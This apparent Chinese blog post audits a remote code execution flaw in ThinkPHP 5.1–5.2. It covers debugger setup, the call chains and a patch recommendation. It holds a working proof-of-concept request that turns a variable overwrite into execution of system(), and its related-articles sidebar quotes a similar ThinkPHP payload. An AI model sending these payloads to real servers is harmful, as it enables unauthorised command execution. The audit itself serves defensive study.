php5.2漏洞,Thinkphp5.1 ~ 5.2 全版本代码执行漏洞代码审计

最新推荐文章于 2021-03-22 15:19:11 发布
最新推荐文章于 2021-03-22 15:19:11 发布
阅读量609 收藏
点赞数
文章标签: php5.2漏洞

0x01 简介

ThinkPHP是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache 2 开源协议发布,一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

之前放出来这个Thinkphp5.1~5.2全版本代码执行漏洞,这个漏洞在5.0.*部分版本中也适用。漏洞执行流程分为两个阶段,第一阶段为利用变量覆盖漏洞,第二阶段利用代码执行触发漏洞。

0x02 环境配置

需要的应用和环境:

1、Windows 10

2、phpStudy

3、phpStorm

4、XDebug

5、火狐浏览器

6、火狐浏览器插件-XDebug-ext

7、ThinkPHP 5.1.30

首先需要将phpStudy和phpStorm安装,安装成功后,phpStudy如图1所示,phpStorm如图2所示,请注意需要使用 PHP 5.6以上版本,不然运行ThinkPHP 5.1.30会报错。

2e00d059636d3e3f1cd83917e16fe4f6.png

图 1

07449f6908aba3a06b83ec39b287ab0c.png

图 2

XDebug 配置需要编辑php.ini,将配置替换如下,路径需要按照实际情况修改,访问PHPINFO,如果存在XDebug信息说明配置成功。如图3所示。

[XDebug]

xdebug.profiler_output_dir="D:\phpStudy\tmp\xdebug"

xdebug.trace_output_dir="D:\phpStudy\tmp\xdebug"

zend_extension="D:\phpStudy\PHPTutorial\php\php-5.6.27-nts\ext\php_xdebug.dll"

xdebug.remote_enable=1 //是否允许远程终端 这里标示开启

xdebug.profiler_enable_trigger=0

xdebug.remote_handler=dbgp

xdebug.remote_mode=req

xdebug.remote_host=localhost

xdebug.remote_port=9000

xdebug.idekey=PHPSTORM

75393af886bbf7a568cc8dd982c52ba2.png

图 3

然后需要配置phpStorm,选择File=>Settings=>php,选择好需要的PHP版本,如图4所示

16535f51555e40f882bf685beb2060b2.png

图 4

选择File=>Settings=>Debug,配置好端口,端口需要和之前的配置文件对应,如图5所示。

e18bbf862c521b63aad19d337be1bf9b.png

图 5

选择File=>Settings=>Servers,配置如图6所示,Name需要和xdebug.idekey对应一致。

d7da5c3338058fc80c1c5873a89c6924.png

图 6

接下来配置火狐浏览器,火狐浏览器用的版本如图7所示。

a1c4c12533b679ff659d3a1e2ee55566.png

图 7

需要安装XDebug-ext,配置如图8所示。

ea7a0ee148c2ba64082c3b976c50291b.png

图 8

最后将ThinkPHP 5.1.30的环境,拷贝到WWW目录中,如图9所示,配置完成。

2b97af27e75af8501ed19e2a34ef3d05.png

图 9

0x03 代码审计

在火狐浏览器中使用POC,通过phpStrom跟踪执行流程。

POC如下:

(post)public/index.php

(data)c=system&f=calc.exe&_method=filter

找到变量覆漏洞,变量覆盖漏洞导致能控制$this->{$method},调用链如下:

Request.php:814, think\Request->method()

RuleGroup.php:151, think\route\RuleGroup->check()

Domain.php:76, think\route\Domain->check()

Route.php:885, think\Route->check()

App.php:604, think\App->routeCheck()

App.php:402, think\App->run()

index.php:21, {main}()

代码位置:thinkphp/library/think/Request.php 814行。如图10所示。

5e7c81d3edfe3025b0f96443a456ecf8.png

图10

找到变量覆盖漏洞触发后,执行流程会逐步返回App.php:435, think\App->run(),找到Middleware.php:130, think\Middleware->dispatch()跟着流程审计会找到执行call_user_func(“system”,”calc.exe”),调用链如下:

Request.php:1455, think\Request->filterValue()

Request.php:1370, array_walk_recursive()

Request.php:1370, think\Request->input()

Request.php:956, think\Request->param()

Module.php:121, think\route\dispatch\Module->think\route\dispatch\{closure}()

Middleware.php:185, call_user_func_array:{D:\phpStudy\PHPTutorial\WWW\thinkphp_5.1.30\thinkphp\library\think\Middleware.php:185}()

Middleware.php:185, think\Middleware->think\{closure}()

Middleware.php:130, call_user_func:{D:\phpStudy\PHPTutorial\WWW\thinkphp_5.1.30\thinkphp\library\think\Middleware.php:130}()

Middleware.php:130, think\Middleware->dispatch()

Module.php:140, think\route\dispatch\Module->exec()

Dispatch.php:168, think\route\Dispatch->run()

App.php:432, think\App->think\{closure}()

Middleware.php:185, call_user_func_array:{D:\phpStudy\PHPTutorial\WWW\thinkphp_5.1.30\thinkphp\library\think\Middleware.php:185}()

Middleware.php:185, think\Middleware->think\{closure}()

Middleware.php:130, call_user_func:{D:\phpStudy\PHPTutorial\WWW\thinkphp_5.1.30\thinkphp\library\think\Middleware.php:130}()

Middleware.php:130, think\Middleware->dispatch()

App.php:435, think\App->run()

index.php:21, {main}()

代码位置:thinkphp/library/think/Request.php 1455行,如图11所示。

8599b389c56b1774f02535432d287da3.png

图 11

通过放出的POC进行复现,漏洞复现结果,如图12所示。

ca72e29e38c200c4a74d034fee13a640.png

图12

0x04 修复建议

1.利用Composer 或官网更新至最新版本。

2.如果不能及时更新,建议参考最新版本的Request类的method方法进行手工修复。

C大调a小调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy学习工具php5.2
09-13
phpstudy学习工具php5.2 珍藏版 简单易学 易上手Apache2.2+php5.2.17+MySQL5.1 php5.2经典组合值得收藏,仅有11M,无需运行库
php5.2+apache2.2.rar
09-15
php比较老版本,该资源为php5.2和apache2.2配套,另外本机需要有vc6运行库,如果没有安装vc运行库,可以到本人的资源里下载
php5.2
liuzp111的专栏
03-27 571
php5.2版本解析json很多问题。。建议高版本
php存在的安漏洞,PHP 5.2.10及之前版本存在多个安漏洞
weixin_39687189的博客
03-10 458
影响系统PHP PHP 5.2.10PHP PHP 5.2.9 -2PHP PHP 5.2.9PHP PHP 5.2.8PHP PHP 5.2.7PHP PHP 5.2.6PHP PHP 5.2.5PHP PHP 5.2.4PHP PHP 5.2.3PHP PHP 5.2.2PHP PHP 5.2.1PHP PHP 5.2不受影响系统PHP PHP 5.2.11危害目前未知。攻击所需条件攻击者必须...
php 5.2.17 mysql_php 5.2|PHP v5.2.17 For windows下载 附安装教程 - 121下载站
weixin_36402765的博客
02-19 1037
PHP v5.2.17 For windows适用于xp、win2003等操作系统,可以方便相应的网页开发人员对PHP源码进行编译测试,这个是32位版本,仅用于32位操作系统。php 5.2安装教程1、首先在php.net上下载windows用的zip包。然后解压,如解压在“C:\php5”2、把根目录下的php5ts.dll复制到系统windows目录下;把php.ini-dist文件改名为ph...
php 5.2下载,php5.2下载|PHP v5.2.9.2 For Windows下载官方安装版_ IT猫扑网
weixin_30054883的博客
03-10 698
php5.2支持iis6的php版本PHP是一种新型的 CGI 程序编写语言,易学易用,运行速度快,可以方便快捷地编写出功能强大,运行速度快,并可同时运行于 Windows、Unix、Linux 平台的Web后台程序,内置了对文件上传、密码认证、Cookies 操作、邮件收发、动态 GIF 生成等功能,PHP 直接为很多数据库提供原本的连接,包括oracle、Sybase、Postgres、my...
修复php-5.2.* hash漏洞
weixin_34032621的博客
03-27 343
前日有信息显示当前包括PHP、Java、Ruby在内的很多语言版本存在漏洞PHP官方开发组成员Laruence(新浪微博)表示***者可以通过构造Hash冲突实现拒绝服务***,并提供了实例。这个***方法危害很高,***成本也很小,一个台式机可以轻松搞垮数十台、上百台服务器。 此漏洞一出,相当于随便一个***者就可以DDoS掉世界上的大部分网站!危害等级绝对是核弹...
深入理解PHP传参原理(PHP5.2)
xiaolei1982致力于Web开发
07-26 1190
这篇文章不错,虽然是5.2,后续会根据这篇文章把5.6和7整理出来 首先说下今天想到的一个问题。在编写php扩展的时候,似乎参数(即传给zend_parse_parameters的变量)是不需要free的。举例: PHP_FUNCTION(test) { char* str; int str_len; if (zend_parse_pa
ThinkPHP<=5.0.13 <= 5.0.23、5.1.0 <= 5.1.16 5.0.0 <= version <= 5.1.32 RCE漏洞分析
Y4tacker的博客
02-12 727
文章目录tp<=5.0.13 POC分析<= 5.0.23、5.1.0 <= 5.1.165.0.0 <= v <= 5.1.32 tp<=5.0.13 POC分析 首先看看payload http://yyy444t.top/public/?s=index/index 我发现这个get传参可以省略 post传入 s=calc&_method=__construct&method=&filter[]=system 首先来看看调用链 我们一个一个
php 5.2 框架,PHP框架Laravel 5.2笔记
weixin_35062801的博客
03-10 168
前言Laravel其实也刚发布不久,以前我一直喜欢使用原生php,一直追求极致,希望能有更高的效率,原始php代码显然效率是最高的。随着php升级到php7后,性能似乎不是一个特别必须的要求。本着多学点知识的前提,开始学习Laravel,科技产品用新不用旧,当然要选择最新版来实施这个研究。新的5.2版本加入了中间件组、MySQL JSON、表单数组校验、增强数据库Session驱动、集合通配符、认...
支持PHP5.2phpMyAdmin 官方最终版
01-05
支持PHP5.2phpMyAdmin 官方最终版, 4.0 以上的其他版本已经不再支持PHP5.2了,保存留个纪念吧!
php5.2.4
12-10
Windows 下的php开发软件。直接解压后进行相关设置即可使用。建议配合Apache使用。
php 5.2 安装,PHP5.2.5安装配置使用手记_PHP
weixin_39875842的博客
03-10 184
PHP出新版了,PHP5.2.5最新版.每次都一样,这次也是发现论坛上传图片总有这里问题那里问题.所以又想到升级PHP了,PHP环境配置一般都差不多,跟前版本基本一样的,因以前我没记录过手记,这次补一下,安装如下:1、上php.net下载最新版本2、解压出来后,部复制到C盘PHP目录3、将php.ini-dist改名为php.ini复制到C盘WINNT目录#如果你是高手建议使用php.ini-r...
php5.2 mysql环境_php5.2+apache2.2+mysql5.5环境搭建
weixin_42307290的博客
02-02 257
注:(本文参考了网上很多人的资料,自己只是进行整理)这两天正尝试使用wordpress,需要搭建环境,在此详细图解在Windows 7下安装配置PHP+Apache+Mysql环境的教程,希望对PHP初学者有所帮助。在Windows 7下进行PHP环境搭建,首先需要下载PHP代码包和Apache与Mysql的安装软件包。PHP版本php-5.2.17-Win32-VC6-x86.msi,VC9是...
php 5.2.x下载,PHP Version之PHP5.2.x到5.3.x
weixin_35327612的博客
03-10 202
不向下兼容的变化1、 在5.3的所有绑定扩展中应用了新的内部参数解析API,当给函数传递不兼容的参数时将返回NULL,但有些例外,比如函数get_class()在出现错误时返回FALSE2、 Clearstatcache() 默认不再清楚缓存的realpath。3、 数组函数natsort(),natcasesort(),usort(),uksort(),array_flip(),和arra...
php5.2漏洞,php5系列的apache远程执行漏洞攻击脚本
weixin_39524147的博客
03-11 372
php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用。。。/* Apache Magica by Kingcope *//* gcc apache-magika.c -o apache-magika -lssl *//* This is a code execution bug in the combination of Apache and PHP.On debian ...
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9820
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
php 5.2 数组,详解php5.2.x数组操作实例
weixin_33308577的博客
03-12 125
php 5.2.x中的数组操作刚看了php入门教程,总结一些由于php版本不同,引发的php数组操作的一些问题。以下内容在 php5.2.5 环境下测试完成。1、
php5.2编译安装教程,PHP 5.2源码编译安装英文文档
weixin_30015509的博客
03-22 251
文如下:关键部分我以有色字体标示之安装文件路径:你下php 5.2的目录/INSTALLApache 2.0 on Unix systemsThis section contains notes and hints specific to Apache 2.0 installsof PHP on Unix systems.WarningWe do not recommend using a t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值